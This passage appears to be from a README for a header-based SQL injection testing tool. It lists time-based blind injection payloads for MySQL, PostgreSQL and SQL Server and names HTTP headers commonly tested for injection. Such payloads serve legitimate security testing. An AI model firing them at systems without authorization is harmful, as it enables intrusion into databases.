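' AND SLEEP(30)-- -            (MySQL)
' AND pg_sleep(30)--           (PostgreSQL)
';WAITFOR DELAY '0:0:30'--     (Microsoft SQL Server)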
You can use the provided headers file, or add more custom headers to that file according to your needs.
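A headers file lists one header name per line; commonly tested injectable headers include (illustrative examples, not necessarily the repo's defaults):
X-Forwarded-For
X-Forwarded-Host
User-Agent
Referer
X-Api-Version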